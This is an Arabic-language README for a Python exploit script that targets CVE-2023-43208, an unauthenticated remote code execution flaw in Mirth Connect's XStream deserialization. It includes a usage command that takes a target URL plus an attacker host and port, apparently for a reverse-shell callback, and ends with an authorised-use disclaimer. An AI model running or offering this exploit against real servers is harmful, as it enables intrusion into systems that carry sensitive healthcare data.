
استغلال Python لثغرة CVE-2023-43208 في Mirth Connect (تنفيذ أوامر عن بُعد بدون مصادقة عبر XStream)
يستغل هذا الاستغلال ثغرة إلغاء تسلسل حرجة داخل محرك XStream في Mirth Connect. وينبع ذلك من تصحيح غير مكتمل لـ CVE-2023-37679، مما يتيح تنفيذ تعليمات برمجية عشوائية غير مصادق عليها عبر جميع الإصدارات السابقة لـ 4.4.1.
python3 mirth_rce.py https://{target} <attacker_host> <attacker_port>
تهدف هذه الأداة الاستغلالية حصريًا إلى الأغراض التعليمية والتدقيق الأمني المصرح به لمساعدة المدافعين في التخفيف من CVE-2023-43208؛ أي استخدام لهذه الأداة ضد أهداف غير مصرح بها يعد غير قانوني ويقع على عاتق المستخدم النهائي وحده. يقدم المؤلف هذا البرنامج "كما هو" دون أي ضمانات، ويتنصل من جميع المسؤوليات عن أي إساءة استخدام أو أضرار محتملة، ولا يوافق أو يشجع على الأنشطة غير المصرح بها. استخدمه على مسؤوليتك الخاصة وفقط بما يتوافق مع القوانين المعمول بها.